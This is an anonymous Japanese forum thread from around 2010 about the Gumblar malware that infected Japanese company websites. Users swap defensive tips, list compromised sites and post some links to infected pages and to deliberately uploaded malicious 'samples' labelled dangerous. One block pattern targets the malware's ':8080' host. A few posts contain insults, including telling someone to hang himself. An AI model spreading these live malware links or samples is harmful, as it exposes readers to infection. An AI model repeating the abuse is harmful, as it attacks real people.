モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です

＞モロゾフの人
首吊って氏んだ方がいいとおもいますよ

ttp://www.aguse.jp/
ってソースどこに表示されるの？
ホストだとかドメインだとかは出てくるんだけど

＞モロゾフの人
文句があったらかかってきなさい

-o_japan-ｵﾙﾃｨｽｼﾞｬﾊﾟﾝｰ

>>773
調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます

飛び先チェック
http://kakiko.com/check/sample.html

更新するものは最新版に更新して、
Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール
Adobe Readerなんて他の無料で軽いの使えばいいんだし
これが一番の防御策だね

>>775
ゴメンこれはサイトを見たいときね

>>702
検体（コードが書いてあるやつ）いるならあげる
うｐできるかわからないけど

>>776
これ知らなかった
ありがとう

ドクター中松さんのサイトは修正済みみたいだね

>>159
ここはまだだね
いつの間にかLGPLに変わってるし

>>738
なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
＞ネズミー

>>782
どういう人かと思って検索したら驚いた

>>783
いちいち言わなくて良いよ

>>782
LGPLだね
元がどうだったか知らないけど

このブラウザ使えるかもしれん
ttp://www.scriptbrowserk.com/

コンテンツブロックに*:8080/*を放り込ｍ(ry

「GNU(ぐぬー)たん」
お馴染みのヌーを萌擬人化したキャラ

誰か・・・描いて・・・

>>773
右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
ttp://gw.aguse.jp/
逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。

ノートンは対応してないのか・・・
>>739の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでＦＡ？
感染してないと思うけど気になるので

朝刊の一面になるほどのニュースなのに
対策していない企業とかマジでありえない
対策していないネットユーザにも責任はあるが
そのままWEBサイトを放置している企業の責任は重大

>>790
ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する

>>159
こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・

フラッシュのバージョンが10.0.42.34だと影響ないということ？

>>792
ありがとう、少し安心した

>>793
Flashは関係ない

>>794
感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認

>>796
タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう

>>797
早い話
オンラインスキャン汁

オンラインスキャンしたところで検出できるやつがなかったりするからな

>>799
オワタ＼(＾o＾)／

今でも（´・ω・） ｽｸﾘﾌﾟﾄが埋め込まれているうｒｌｐｌｚ

Quick Time ですけど、QuickTime Alternativeはどうなんでしょ？入れて置いてもいいの？
アホな質問しているのかしら…。

>>783
TDLのガイドライン・・・

>>800
おｋ
うpしてくる（自分のサイトに）

>>803
お前はさっきから何がしたいんだ？

http://www16.atpages.jｐ/filedl/dnserror.html

検体的なもの（アクセスすると危険）

>>805
エラーにみせかけるとな？
鬼畜ですな

>>805
/*GNU GPL*/

>>805
カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード

>>808
それやばい

>>806
エラー画面をみて思いつきましたw

まいど。
ttp://www.okamoto.co.jp/
KIS2010で検出。

新ウイルスに対応したオンラインスキャナーないのかよ・・・
アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・

>>811


Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

>>811

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010

>>812
なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)


upの仕方

コードを書いてtxtに
↓
up
↓
txtをhtmlに書き換え

ヽ('A`)ﾉ　完成!
　(　 )
　ﾉω|

感染の有無をチェックする無料のオンラインスキャンサービス

http://www.trendflexsecurity.jp/housecall/index.html?WT.ac=JPclusty_onlinescan
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=jp&venid=sym

>>811
なにも起こらない　　当たり前だけど
(pspで2ch北から)

検体upは仮装pcから←オヌヌメ

>>817
最近のウイルスはホストOSまで影響を与えるらしいよ（そよっ

仮想PCだから安心なんてのは幻想にすぎんよ

>>811
こういうのは2chブラウザビューアで見ても感染しない？

>>820
winマシンで見る限り絶対安心とは言えない

>>817
押入れから古いPC(HDD無)引っ張り出して
KNOPPIX(DVD)＋USBメモリマウント

http://www.copper-brass.gr.jp/

日本伸銅協会

>>777
Adobe互換ソフトも必ずしも安全ではないと何度言えば

>>818
(　ﾟдﾟ)

(つд⊂)ｺﾞｼｺﾞｼ

(；ﾟдﾟ)

(つд⊂)ｺﾞｼｺﾞｼ
　　_, ._
（；ﾟ Дﾟ） …？!

( ﾟдﾟ )フラグビンビン[ﾋﾟｰ]ビンビン

>>812
まずはOSの入れなおしからどうぞ

もうこうなると、まだ無事なサイト上げた方が早い気すらしてくる

ホストpcスペック
OS windows7
メモリー　4GB
CPU AMD　アスロン64X2 2.7GHz
ADOBE 8.12
flash　最新
JRE ? 12

他はともかく、JREはアンインスコしとけば他のウィルス対策にもなるから
アンインスコしない手はない

>>826
ウイルス踏んでもいないのにクリーンインストールかよ・・・
アレなんだよ・・・NICのドライバと競合して入れられない俺のマシン
アンチウイルスと犬猿の仲・・・

>>829
俺はJREがないと2chが見れませんので無理でつ

>>830
ドライバソフトの更新ないの？

>>832
最近更新されていないお・・・
バージョンを色々と変えてみたが・・・ムリポ

>>823
あれ、教えてもずっと放置してたのにいつの間にかサーバ落としたのか

>>834
ここ見てたんですかねぇ。。。

ウイルスに感染できるうｒｌｐｌｚ

>>717
ケータイに感染するウィルスなかったっけ

「日本伸銅協会」をヤフで検索、キャッシュのソース内にしっかりと/*GNU GPL*/がｗｗｗ

http://www.okamoto.co●jp/js/over.js

/*LGPL*/ ですね

危ないURLを踏んでみたが感染しなかったｗｗｗ
俺最強

『蜂の家』でググって一番上のサイトはまだ感染してるのかな

このウイルスって２度目のアクセスは感染させるためのページ表示させない仕様なのかな？

アプリケーションの追加と削除にJAVAの旧バージョンが10個位あったんだけど影響とかあるの？

javaなんてほとんど使い道ないから全部消した方が安心

お絵かきチャットできなくなっちゃう！＞＜

今日の会社のお年寄りの会話
おっさんA「ガンプラって怖いらいな、ＨＰ見ただけで・・・」
おっさんB「ブログ見ただけでも感染するって書いてあるぞ・・・」


もれ心の中で「それ、ガンプラじゃなくてガンブラーだから・・・
　　　　　　　しかも、仕事中にどんなところ覗いているんだよ・・・おっさんども。」

Java消したらEclipse使えないじゃん

誰かウイルス本体を上げてくれ
ttp://ux.getuploader.com/virus/

>>744
鳩山首相のtwitter偽アカウントやってたメガネ王という人のブログにmooterのブログパーツがあって、
年末ちょっと騒動になった

インターネットに公開してる企業のサイトは、
セキュリティのきっちりしたデータセンターに鯖が置いてあって、
更新時なんかは許可された端末からのみVPN経由でできるよう
にしてあるのが常識だと思ってたんだけど、意外とみんなそうじゃないんだね・・・

そんなところはほとんどないだろ

社内セキュリティ＞サイト

>>850
それやってもやられるものはやられる

>>847
そうそう
JREのバージョンを上げるって対策だけはおいそれと出来ないから困ってる

>>854
色々不具合が起きるケースが多いわな、確かに。

わかります、戸松遥，中島愛，早見沙織なわけですね

変則的だけど、インストーラは別だからシステムに影響するJREは最新にして
JDK側は開発に合わせるとかもできなくもない気がする
試してないけどね

お絵かきしたい人は諦めてくれ

Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt

インシデントの届出
ttps://form.jpcert.or.jp/

記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
結構適当でいいらしい。

>>844
JAVAのバージョンチェックしたらJAVAそのものが入っていなかったでござる

噴いたｗｗｗ

>>859
あれ？　俺書いたっけ・・・
とりあえずＪＡＶＡ入れてきたｗ

>>732見たけど
■三栄コーポレーション（2010年1月8日発表）
告知：「モッフル」ホームページの改ざんとウイルス被害に関する報告とお詫び[PDF]

いま出すお詫びがPDFでなくてもよかろうもん

>>861
なかったもんをなぜわざわざ入れるのだ

サイバー／サーバー／サバイバー(なんかキワモノバンドの名前になりそうな)

　しかしネットサーフィンも電脳サバイバルの様相を呈してきた感じ・・・

20XX年にはネットサーフィンをしていて脳を焼き切られたりする訳か。

>>841
してるよ

ノートソ警察w
tp://megalodon●jp/2010-0107-1225-07/ameblo●jp/caetla-2008/entry-10427328482●html

>753
(4) JRE(Java Runtime Environment)を最新版に更新する

JRE入れてなかったら問題無い？
それともJRE入れて最新版にしとかないと駄目？

いらないなら入れる必要はない

個人PCに悪さしないならおとなしくAvast!のupdateまったほうがいいんではないかな

ttp://bakera.jp/ebi/topic/4016
似通った文章にみえた
指南してる人いるのかな

>>870
avast使ってる人はそれでも良いんじゃないか
みんなが使ってると思ってるのかな

avast!ﾀﾝ　ずっと一緒だお！
きゅいきゅい　きゅいーん！

もう馬鹿しか使ってない

>>872
なんでもいいけどアンチウイルスのupdateをまてばいいのさ

意味分からねえな
馬鹿havastのスレいけよ

アンチウイルスの対応待つんじゃなくて
脆弱性の対処しとけば良いだけだ
avastなんかに期待するな

>>849
検索窓のパーツに含まれてるJavaScriptファイルがやられてたので
設置してたサイトは改ざんサイト同然。

「ノートン警察」のブログパーツもJavaScriptファイルだから同じね。

>>744

＞期間：2009年12月25日1時〜12月28日18時30分

改ざんファイルのタイムスタンプは 2009/12/24 1:30（GMT）周辺だったんだが、
どういう計算すると12月25日1時になるんだろ。

2009/12/26 2:47:54（GMT）に、検索窓のJavaScriptファイルだけ直したみたい。
ほかの奴のは29日夕方だけど、28日18時30分に閉鎖したってことかな

http://www.note-pc.biz/
このページ改竄されてね？js検知すんぞ

>>879
ttp://www●note-pc●biz/js/rollover●js
rollover.jsにぐぬーたんがいるおっおｗｗ

おっっっっっっっっっっっっっっっっっっっっっっっっはっっっっっっっっっっっっっっっっっっっっっっっっっっっようごっごっごごごごごございまｋっさ

>>880
aguseのカスペが反応しないんだが新種かねぇ？

http://www16●atpages.jｐ/fileｄl/ds%20psp%20syosinsyakouza.html

>>883
検体です
（踏んだら危険）

>>882
ほい
http://www.virustotal.com/analisis/cf4b42203397f1b333f0cf763a5aa081c3a8abc226af58e861f23880ac8c0a78-1262998068

ClamAVに検体送っといたお

>>885
ﾃﾝｷｭｰ

>>883に付け加え

コード
が
書いてある
だけ
です

>>879を踏んでみた→Adobe ReaderとJavaが起動したが結局何も起こらず
両者とも最新版だお

ニフティのオンラインスキャンやっても
3万ファイルぐらいでスキャン終了されて
system32のログとかローカルの中のtmpとかロック扱いで中身見てもらえないんだが
これ本当に大丈夫なんだろうか

マカフィーは今日手動更新してもファイル更新できないし
FTP使った後、一時間以上サイト改ざんされなければもう白でいいのか？

>>889
＞踏んでみた→Adobe ReaderとJavaが起動
これアウトじゃね？
pdf開いてないのにReaderは普通起動しないだろ…

>>891
ttp://www.keiyu.com/doc/pdflink.htm
embedでPDFを埋め込めるお

/*------------------------------------------------------------
* ロールオーバーを設定する画像にクラス名「over」を指定
* ロールオーバー時に表示するための画像ファイル名後ろに「_over」をつける
/*------------------------------------------------------------*/

しかも今回の攻撃は最新版のAdobe Readerがまだ修正してない脆弱性を使うようなんだが…
仮想環境でもないWindowsであんまりチャレンジしない方がいいぞ

その落ちてくるPDFってのをくれ
scriptが埋め込むURLにアクセスしても0byteが帰ってくるだけで
何も落ちてこない。
windows使ってないから？リファラ見てる？

今回悪用されていると思われる脆弱性のPoC拾ってきたお
悪質なコードを取り除きPDFを作成次第配布するお

>>889
ReaderはバージョンだけじゃなくJavaScript機能オフまでが対策

>>890
1時間程度じゃ改ざんされない可能性もある
心配ならOS入れなおせよ

>>895
リファラも見てるかもしれんが
少なくともUserAgentは見てるんじゃね

>>895
>>896のようにPoCをちょっといじったものなら別スレで喜んで張ってた奴がいる
avast!のWebシールドでも反応しない新ガンブラーが登場
http://tsushima.2ch.net/test/read.cgi/news/1262886266/

wgetで普通に取れる　ただこれは今回実際に攻撃に使われてるものではない

>>889
> Adobe ReaderとJavaが起動したが結局何も起こらず
何も起きてないことをどうやって確認したんだ？

>>900
ファイル操作系のAPIを全てフックして監視していたお
念のためにディスクイメージも比較した
結論：特に変化無し

>>889は、まだトロイ本体が侵入して無いだけの状態かな？

>>901
APIフックって自作？
何かツールあるの？

企業が結構やられてるから個人のサイトなんかもう恐くて見れないな
２ちゃんがやられる可能性もあるの？

>>903
自作だお
既製品はシラネ

時間経過で変化出るのかな

>>905
俺に作り方教えてくれ

>>907
言語は？

>>901
砂箱つかえよ
Sandboxieとか

>>908
一応Cできる。カーネルの知識はない。

>>910
要するにファイル操作系のAPIを全てフックして監視すればいいんじゃね？

>>901
古いreaderとか入れろよ

>>879
パソコンお直し隊 電話番号
http://www.google.co.jp/search?hl=ja&source=hp&q=%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%81%8A%E7%9B%B4%E3%81%97%E9%9A%8A+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&lr=&rlz=1R2ADBR_ja&aq=5mr&oq=%E3%81%8A%E3%81%AA%E3%81%8A%E3%81%97%E3%81%9F%E3%81%84
2010-1-9（土）11:46電凸
中国人？が出る
よく分からんが、むかついたので完了とする
これ以降は、恣意的にウイルスを拡散しているものと判断

>>811
凸電した
お宅のHPをみたらPCぶっ壊れたと言ってやった

>>879
HEUR:Exploit.Script.Generic

ｶｽﾍﾟﾙｽｷｰ
ジェネリックで検知

http://www.note-pc.biz/
ここはもう何も落としてこないな
単にアンチウィルスが反応するだけで、pdfも送り返して来ない

ru:8080側でアクセス制御していて2度目以降は404を装うと何度言ったら…。
IP変えて(串可)どうぞ。

アンチウイルスが反応するリンクをそのまま張るな

>>912
それは軽く死ねる

またAviraは誤検出か
いい加減にしとけや

ファイル操作系だけじゃなくてプロセス生成とかネットワークを監視しなくていいのか？
というか監視は普通にProcess Monitorとかでできるんじゃないか

高木浩光さんコメントお願いします

高木はNyzillaで忙しい

>>921
それだと表示されない関数があるお
Wiresharkと適当な実装のAPIフックプログラムを併用しているお

何故かVistaでフック出来ない件
教えてエロい人

ム板行け

語尾の「〜お」がキモい
死ね

はいはいVipper乙

おちつけお（　＾ω＾）

(ﾟωﾟ)VIPお断りします

（´・ω・） ｶﾜｲｿｽ

>>924
プラグインの起動まではしているがその後こけてるということか
具体的にどういうコードが動いてるかは見てる？

セキュ板はNoノートンだおだお

このメールは全ご登録ユーザー様、
および製品情報サービスを申し込まれた方にお送りしております。

「Gumblar（ガンブラー）」関連ウイルスにご注意ください

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　ソースネクスト株式会社

いつもソースネクスト製品をご愛用いただき、誠にありがとうございます。
さて、現在、改ざんされたサイトを閲覧しただけで感染する「Gumblar（ガンブラー）」と
その亜種が流行しています。念のため、利用されているウイルス対策ソフトの対応状況を
確認されることをおすすめいたします。

なお、ソースネクストの「ウイルスセキュリティ」は、これらのウイルスに対応済みですので、
必要な方はこの機会にご検討ください。

　　セキュリティ製品のお客様専用サイト
　　http://mail.sourcenext.info/c/arzdfpimb1tdwKab

　　「ウイルスセキュリティ」のお買い求めはこちら
　　eSHOP価格4,480円 （標準価格 4,980円） 10％OFF
　　http://mail.sourcenext.info/c/arzdfpimb1tdwKac

今後ともソースネクスト製品を末永くお使いいただきますようお願い申し上げます

だが！　断る！！

>>932
バスターでサクサク快適アルヨー

ClamAVニダ

>>616
FTP通信そのものを見てるとしたら繋いだFTP鯖だけだよね
繋いでないのに改竄されてる・一つ繋いだら他のFTP鯖のサイトも改竄されたと言ってる人はどうなるの？

繋いだのに忘れてるのかな？

>>937
FTPクライアントにパスが保存してあるって
それを読み取られてるんじゃね？

嗚呼w日本語がｗ

JAVAとJavascriptオフにしてたら感染しない？

>>937
genoを解析したところによると一部のFTPクライアントの設定を読み取って改ざんするとなってた。

スレの内容も堂々巡りだなｗ

>>941
Genoとは別物だけどね
FTPクライアントの設定ファイルは見てるのは事実

【Geno】　ガンブラーウィルス　 ヤフーも被害に　　昨年１０月２７日〜今年１月８日
http://tsushima.2ch.net/test/read.cgi/news/1263036497/

こう頻繁に見つかると企業の極秘情報も中国に売られてるんじゃない？

avast! が LGPL のスクリプトに対応した
JS:Illredir-C [Trj]

LGPLタイプのvirus total 再解析
結果: 10/41 (24.4%)
http://www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1263043815

こっちのLGPLはもっと少ないな
新たにavastが加わったくらいだ
結果: 6/41 (14.64%)
http://www.virustotal.com/jp/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674

カーチャンのPCが物凄いアクセスしてくる

カーチャンが必死なんだろ

カーチャンがんがれ！

>>948
100109-0の定義データでavast!がLGPLに対応したみたいだ
手持ちの12個の検体すべてに反応するようになった

馬鹿には（´・ω・） ｽnｽn出来ない（´・ω・） ｽｸﾘﾌﾟﾄ
ttp://2sen.dip.jp/cgi-bin/upgun/up1/source/up36231.htm

権限なしのなら大丈夫？

>>953
これはなんだ？
NoScript入れてたからどうもないと思うが

Security Tool はGumblarみたいにFTP情報流したりしないの？

>>953
NoScript解いたけどどうもならないな・・・

俺
http://www29.atwiki.jp/geno/
の管理人だけど、更新したほうがいい？

正直今頃になって大騒ぎするとは思わなかったわ

>>958
更新してくれるとありがたい

>>958
当たり前だろ。出来ないんだったら
古い情報垂れ流して混乱招くからサイトごと消せ